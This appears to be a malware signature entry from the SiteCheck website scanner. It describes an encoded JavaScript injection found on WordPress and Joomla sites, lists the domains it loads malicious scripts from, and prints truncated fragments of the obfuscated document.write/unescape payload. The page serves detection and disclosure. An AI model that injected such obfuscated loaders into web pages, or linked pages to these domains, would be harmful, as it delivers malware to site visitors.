SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs222

malware-entry-mwjs222

Description:This encoded javascript loads malware from:
.myads.name/system/caption.js
.adsnet.biz/system/caption.js
.toolbarcom.org/system/caption.js
.mybar.us/system/caption.js
.freead.name/system/caption.js
bl.prshow.org/js/in.js
bl.pqshow.org/js/in.js
bl2.prshow.org/js/in.js
bl2.pqshow.org/js/in.js
.ipwn.ws
.crocro.biz/
.etufg.com/tools/js.js
sliero.co.cc

And some sub domains within it:
"vagi.","vain.","vale.","vars.","vary.","vasa.","vaut.",
"vavs.","viny.","viol.","vrow.","vugs.","vuln."

Affecting: Any web site (common on WordPress and Joomla) hosted at Rackspace, Mediatemple and Bluehost.

Malware dump:


document. write (unescape( '%3C %73 %63%72%69%70%74%20%6C%61%6E%67%75 %61%67%65%3D%22%6A%61%76%61%73%63%72%69 %70%74%22%20%74..

;var st1 = 0;document. write ( unescape (' %3C%73%63%72%69%70%74...